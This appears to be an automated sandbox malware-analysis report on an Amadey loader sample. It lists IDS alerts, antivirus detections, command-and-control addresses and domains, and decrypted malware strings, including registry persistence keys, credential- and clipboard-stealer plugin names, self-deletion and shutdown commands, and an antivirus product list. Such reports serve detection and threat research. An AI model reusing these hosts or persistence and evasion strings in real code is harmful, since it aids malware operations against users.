                              2025-03-07T18:11:17.145052+010020606571Domain Observed Used for C2 Detected192.168.2.7531821.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:30.632641+010020605361Domain Observed Used for C2 Detected192.168.2.7498341.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:10:59.950347+010020605681Domain Observed Used for C2 Detected192.168.2.7521571.1.1.153UDP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:18.198830+010020442451Malware Command and Control Activity Detected38.180.229.21780192.168.2.749732TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:18.189608+010020442441Malware Command and Control Activity Detected192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:18.403814+010020442461Malware Command and Control Activity Detected192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:19.041806+010020442481Malware Command and Control Activity Detected192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:18.430082+010020442471Malware Command and Control Activity Detected38.180.229.21780192.168.2.749732TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:10.156835+010020480941Malware Command and Control Activity Detected192.168.2.749721172.67.214.226443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:17.936234+010020442431Malware Command and Control Activity Detected192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:10:08.283658+010028561471A Network Trojan was detected192.168.2.749696176.113.115.680TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:14.039325+010028561481A Network Trojan was detected192.168.2.749724185.215.113.20980TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:10:13.248048+010028033053Unknown Traffic192.168.2.749698176.113.115.780TCP
                              2025-03-07T18:10:26.816678+010028033053Unknown Traffic192.168.2.749700176.113.115.780TCP
                              2025-03-07T18:10:35.535287+010028033053Unknown Traffic192.168.2.749702176.113.115.780TCP
                              2025-03-07T18:10:46.475776+010028033053Unknown Traffic192.168.2.749704176.113.115.780TCP
                              2025-03-07T18:10:53.034647+010028033053Unknown Traffic192.168.2.749707176.113.115.780TCP
                              2025-03-07T18:11:00.265223+010028033053Unknown Traffic192.168.2.749713176.113.115.780TCP
                              2025-03-07T18:11:06.075510+010028033053Unknown Traffic192.168.2.749719185.215.113.1680TCP
                              2025-03-07T18:11:12.988257+010028033053Unknown Traffic192.168.2.749726176.113.115.780TCP
                              2025-03-07T18:11:18.259064+010028033053Unknown Traffic192.168.2.749728140.82.121.4443TCP
                              2025-03-07T18:11:24.510774+010028033053Unknown Traffic192.168.2.74973682.115.223.119443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:19.268640+010028033043Unknown Traffic192.168.2.74973238.180.229.21780TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:14.039325+010028560961A Network Trojan was detected192.168.2.749724185.215.113.20980TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2025-03-07T18:11:11.862081+010028560971A Network Trojan was detected192.168.2.749724185.215.113.20980TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: mQRr8Rkorf.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: https://defaulemot.run:443/jUSiazalAvira URL Cloud: Label: malware
                              Source: https://fostinjec.today/Avira URL Cloud: Label: malware
                              Source: https://fostinjec.today:443/LksNAzAvira URL Cloud: Label: malware
                              Source: https://defaulemot.run:443/jUSiazAvira URL Cloud: Label: malware
                              Source: https://agroecologyguide.digital/apiAvira URL Cloud: Label: malware
                              Source: https://defaulemot.run/KyAvira URL Cloud: Label: malware
                              Source: https://defaulemot.run/RyAvira URL Cloud: Label: malware
                              Source: https://fostinjec.today/LksNAzAvira URL Cloud: Label: malware
                              Source: https://fostinjec.today/:Avira URL Cloud: Label: malware
                              Source: https://defaulemot.run/jUSiaz#Avira URL Cloud: Label: malware
                              Source: https://defaulemot.run/Avira URL Cloud: Label: malware
                              Source: https://defaulemot.run/jUSiazAvira URL Cloud: Label: malware
                              Source: https://fostinjec.today/wjAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exeAvira: detection malicious, Label: TR/AD.Nekark.hettb
                              Source: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exeAvira: detection malicious, Label: TR/AD.Nekark.aowlo
                              Source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exeAvira: detection malicious, Label: TR/Redcap.zvzjx
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exeAvira: detection malicious, Label: TR/Redcap.zvzjx
                              Source: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exeAvira: detection malicious, Label: HEUR/AGEN.1329724
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeAvira: detection malicious, Label: TR/AD.Nekark.aowlo
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeAvira: detection malicious, Label: TR/AD.Nekark.hettb
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exeAvira: detection malicious, Label: HEUR/AGEN.1329724
                              Found malware configuration
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpMalware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\9hUDDVk[1].exeReversingLabs: Detection: 54%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\amnew[1].exeReversingLabs: Detection: 100%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\bncn6rv[1].exeReversingLabs: Detection: 76%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\pwHxMTy[1].exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\ADFoyxP[1].exeReversingLabs: Detection: 13%
                              Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\T0QdO0l[1].exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Temp\10112790101\ADFoyxP.exeReversingLabs: Detection: 13%
                              Source: C:\Users\user\AppData\Local\Temp\10114440101\9hUDDVk.exeReversingLabs: Detection: 54%
                              Source: C:\Users\user\AppData\Local\Temp\10114630101\pwHxMTy.exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\AppData\Local\Temp\10115790101\T0QdO0l.exeReversingLabs: Detection: 63%
                              Source: C:\Users\user\AppData\Local\Temp\10121660101\amnew.exeReversingLabs: Detection: 100%
                              Source: C:\Users\user\AppData\Local\Temp\10122730101\bncn6rv.exeReversingLabs: Detection: 76%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\3E11p.exeReversingLabs: Detection: 57%
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeReversingLabs: Detection: 55%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1E08u3.exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\2R0700.exeReversingLabs: Detection: 59%
                              Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeReversingLabs: Detection: 60%
                              Source: C:\Users\user\AppData\Local\Temp\hanReversingLabs: Detection: 42%
                              Source: C:\Users\user\AppData\Local\Temp\uvwnwebboksgReversingLabs: Detection: 42%
                              Multi AV Scanner detection for submitted file
                              Source: mQRr8Rkorf.exeVirustotal: Detection: 65%Perma Link
                              Source: mQRr8Rkorf.exeReversingLabs: Detection: 55%
                              Joe Sandbox ML detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                              Sample uses string decryption to hide its real strings
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 176.113.115.6
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: /Ni9kiput/index.php
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: S-%lu-
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: bb556cff4a
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: rapes.exe
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Startup
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: cmd /C RMDIR /s/q
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: rundll32
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Programs
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: %USERPROFILE%
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: cred.dll|clip.dll|
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: cred.dll
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: clip.dll
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: http://
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: https://
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: /quiet
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: /Plugins/
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: &unit=
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: shell32.dll
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: kernel32.dll
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: GetNativeSystemInfo
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: ProgramData\
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: AVAST Software
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Kaspersky Lab
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Panda Security
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Doctor Web
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 360TotalSecurity
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Bitdefender
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Norton
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Sophos
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Comodo
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: WinDefender
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 0123456789
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Content-Type: multipart/form-data; boundary=----
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: ------
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: ?scr=1
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Content-Type: application/x-www-form-urlencoded
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: ComputerName
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: -unicode-
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: VideoID
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: DefaultSettings.XResolution
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: DefaultSettings.YResolution
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: ProductName
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: CurrentBuild
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: rundll32.exe
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: "taskkill /f /im "
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: " && timeout 1 && del
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: && Exit"
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: " && ren
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Powershell.exe
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: -executionpolicy remotesigned -File "
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: shutdown -s -t 0
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: random
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: Keyboard Layout\Preload
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 00000419
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 00000422
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 00000423
                              Source: 00000002.00000002.944594396.0000000000491000.00000040.00000001.01000000.00000005.sdmpString decryptor: 0000043f
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: fostinjec.today/LksNAz
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: begindecafer.world/QwdZdf
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: garagedrootz.top/oPsoJAN
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: modelshiverd.icu/bJhnsj
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: arisechairedd.shop/JnsHY
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: catterjur.run/boSnzhu
                              Source: 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmpString decryptor: orangemyther.live/IozZ
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00FA2F1D
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00922F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00922F1D
                              Source: mQRr8Rkorf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49681 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49682 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49683 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49684 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49685 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49686 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49687 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49705 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49710 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49714 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49718 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49720 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49725 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.7:49729 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49733 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 82.115.223.119:443 -> 192.168.2.7:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 104.21.48.201:443 -> 192.168.2.7:49759 version: TLS 1.2
                              Source: mQRr8Rkorf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                              Source: Binary string: wextract.pdb source: mQRr8Rkorf.exe, mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb,, source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: wextract.pdbGCTL source: mQRr8Rkorf.exe, 00000000.00000000.872809030.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, A7B94.exe, 00000001.00000002.1214131092.0000000000921000.00000020.00000001.01000000.00000004.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdbww3 source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: ntdll.pdb source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdbUGP source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: ntdll.pdbUGP source: HmngBpR.exe, 00000010.00000002.1535870954.0000000006930000.00000004.00000800.00020000.00000000.sdmp, HmngBpR.exe, 00000010.00000002.1514138504.0000000004D64000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: wntdll.pdb source: SplashWin.exe, 00000011.00000002.1475323397.0000000009A30000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475142879.00000000096D9000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538393968.000000000A50C000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1537077203.0000000009DF6000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1538039392.000000000A150000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740092927.000000000552E000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.1740428427.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1917845908.000000000A1A7000.00000004.00000001.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1915903801.0000000009DF0000.00000004.00000800.00020000.00000000.sdmp, SplashWin.exe, 00000030.00000002.1901427036.0000000009A93000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: E:\workdir\ProgramDatabase\DuiLib_u.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1476151236.000000006D715000.00000002.00000001.01000000.00000015.sdmp, SplashWin.exe, 00000012.00000002.1540319838.000000006C605000.00000002.00000001.01000000.00000019.sdmp, SplashWin.exe, 00000030.00000002.1939527563.000000006C915000.00000002.00000001.01000000.00000019.sdmp
                              Source: Binary string: C:\Users\Admin\source\repos\Absolut\Absolut\obj\Release\Absolut.pdb source: pwHxMTy.exe, 0000002D.00000002.1939541599.0000000004209000.00000004.00000800.00020000.00000000.sdmp, pwHxMTy.exe, 0000002D.00000000.1699171423.0000000000FF2000.00000002.00000001.01000000.00000022.sdmp
                              Source: Binary string: E:\workdir\vc\rbin\RCClient\SplashWin.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1470296297.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000011.00000000.1459370608.00000000009F3000.00000002.00000001.01000000.00000014.sdmp, SplashWin.exe, 00000012.00000002.1529025581.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp, SplashWin.exe, 00000012.00000000.1468327716.0000000000AD3000.00000002.00000001.01000000.00000018.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000078FB000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000011.00000002.1475931194.000000006D681000.00000020.00000001.01000000.00000016.sdmp, SplashWin.exe, 00000011.00000003.1467481979.0000000000713000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, 00000012.00000002.1541298389.000000006CF71000.00000020.00000001.01000000.0000001A.sdmp
                              Source: Binary string: D:\agent\_work\20\s\\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: HmngBpR.exe, 00000010.00000002.1538813274.00000000075CF000.00000004.00000020.00020000.00000000.sdmp, SplashWin.exe, SplashWin.exe, 00000011.00000002.1475681626.000000006D601000.00000020.00000001.01000000.00000017.sdmp, SplashWin.exe, 00000012.00000002.1540622430.000000006CDA1000.00000020.00000001.01000000.0000001B.sdmp, SplashWin.exe, 00000030.00000002.1941370087.000000006CF11000.00000020.00000001.01000000.0000001B.sdmp
                              Source: C:\Users\user\Desktop\mQRr8Rkorf.exeCode function: 0_2_00FA2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00FA2390
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeCode function: 1_2_00922390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00922390
                              Source: C:\Users\user\AppData\Local\Temp\Dockerprotectysd\SplashWin.exeCode function: 17_2_6D6120D0 _Open_dir,FindFirstFileExW,__Read_dir,FindClose,17_2_6D6120D0
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\2R0700.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\A7B94.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
